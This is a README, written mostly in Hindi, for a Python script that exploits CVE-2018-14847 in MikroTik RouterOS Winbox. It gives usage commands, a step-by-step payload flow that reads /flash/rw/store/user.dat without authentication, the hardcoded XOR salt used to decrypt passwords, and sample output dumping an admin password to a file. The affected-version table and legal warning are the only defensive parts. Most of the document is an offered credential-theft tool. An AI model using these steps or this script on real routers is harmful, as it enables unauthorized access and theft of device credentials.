
VULNERAVEL CVE-2018-14847 - CREDENCIAIS EXTRAIDAS MIKROTIK EM PYTHON
ऑडिटिंग और नेटवर्क पैठ परीक्षण के लिए स्क्रिप्ट्स का भंडार। केवल औपचारिक प्राधिकरण वाले उपकरणों पर उपयोग करें।
MikroTik RouterOS की Winbox सेवा में अप्रमाणित फ़ाइल पढ़ने की कमज़ोरी का शोषण करता है। फ़ाइल हैंडलर (हैंडलर ID 2) प्रमाणीकरण को मान्य नहीं करता, जिससे बाहरी हमलावर user.dat फ़ाइल पढ़ सकता है जिसमें डिवाइस के सभी उपयोगकर्ता और पासवर्ड होते हैं।
पासवर्ड MD5(उपयोगकर्ता + "283i4jfkai3389") कुंजी का उपयोग करके XOR एन्क्रिप्टेड संग्रहीत होते हैं। स्क्रिप्ट स्वचालित रूप से डिक्रिप्शन करती है।
| ब्रांच | भेद्य अंतिम संस्करण | सुधारित संस्करण |
|---|---|---|
| Stable | 6.42 | 6.42.1 |
| Long-term | 6.40.7 | 6.40.8 |
| RC | 6.42 | 6.43 |
python3 cve_2018_14847.py <IP>
python3 cve_2018_14847.py <IP> --port 8291
# डिफ़ॉल्ट लक्ष्य पोर्ट 8291 पर
python3 cve_2018_14847.py 192.168.1.1
# कस्टम पोर्ट
python3 cve_2018_14847.py 192.168.1.1 --port 8291
1. पोर्ट 8291 (Winbox) से कनेक्ट करें
↓
2. FIRST_PAYLOAD भेजें — सत्र खोलें + /flash/rw/store/user.dat का अनुरोध करें
↓
3. प्रतिक्रिया के बाइट 38 से सत्र ID निकालें
↓
4. SECOND_PAYLOAD के बाइट 19 में सत्र ID इंजेक्ट करें
↓
5. SECOND_PAYLOAD भेजें — user.dat फ़ाइल पढ़ें
↓
6. M2 प्रविष्टियाँ पार्स करें → उपयोगकर्ता और एन्क्रिप्टेड पासवर्ड निकालें
↓
7. पासवर्ड डिक्रिप्ट करें: XOR with MD5(उपयोगकर्ता + salt)
↓
8. क्रेडेंशियल प्रदर्शित करें और फ़ाइल में सहेजें
═══════════════════════════════════════════════════════
CVE-2018-14847 — MikroTik Winbox Credential Dump
अप्रमाणित फ़ाइल पढ़ना + पासवर्ड डिक्रिप्शन
प्रभावित: RouterOS 6.29 – 6.42 (< 6.40.8 / 6.42.1)
═══════════════════════════════════════════════════════
लक्ष्य : 192.168.1.1:8291
दिनांक : 2026-05-20 18:06:58
[*] 192.168.1.1:8291 से कनेक्ट हो रहा है...
[+] Winbox सेवा से कनेक्ट हुआ।
[*] पेलोड 1 भेज रहा है (फ़ाइल अनुरोध)...
[+] प्रतिक्रिया प्राप्त हुई (84 बाइट्स)। सत्र ID: 0x35
[*] पेलोड 2 भेज रहा है (user.dat पढ़ना)...
[+] डेटा प्राप्त हुआ (312 बाइट्स)।
[*] user.dat विश्लेषण कर रहा है (257 उपयोगी बाइट्स) ...
═══════════════════════════════════════════════════════
निकाले गए क्रेडेंशियल
═══════════════════════════════════════════════════════
उपयोगकर्ता : admin
पासवर्ड : senha123
कॉम्बो : admin:senha123
───────────────────────────────────────────────────────
[+] 1 क्रेडेंशियल मिली।
[+] परिणाम सहेजा गया: mikrotik_1192.168.1.1_20260520_180658.txt
परिणाम स्वचालित रूप से सहेजा जाता है:
mikrotik_<IP>_<TIMESTAMP>.txt
उदाहरण: mikrotik_192.168.1.1_20260520_180658.txt
इसमें शामिल: लक्ष्य का IP, दिनांक, CVE, प्रभावित संस्करण और सभी उपयोगकर्ता:पासवर्ड जोड़े।
/rede/
├── README.md # यह फ़ाइल
├── cve_2018_14847.py # MikroTik Winbox क्रेडेंशियल एक्सट्रैक्टर
├── pentest_cgnat_100.64.0.0.md # CGNAT पेंटेस्ट रिपोर्ट
├── pentest_roteador_192.168.2.1.md # राउटर पेंटेस्ट रिपोर्ट
└── mikrotik_<IP>_<TIMESTAMP>.txt # स्क्रिप्ट द्वारा उत्पन्न परिणाम
कानूनी चेतावनी: ये उपकरण केवल अधिकृत वातावरण में उपयोग के लिए हैं। तीसरे पक्ष के सिस्टम के विरुद्ध अनधिकृत निष्पादन अपराध है, जो लेई 12.737/2012 (कैरोलीना डाइकमान कानून) और ब्राज़ीलियाई आपराधिक संहिता के कला. 154-A के अंतर्गत दंडनीय है।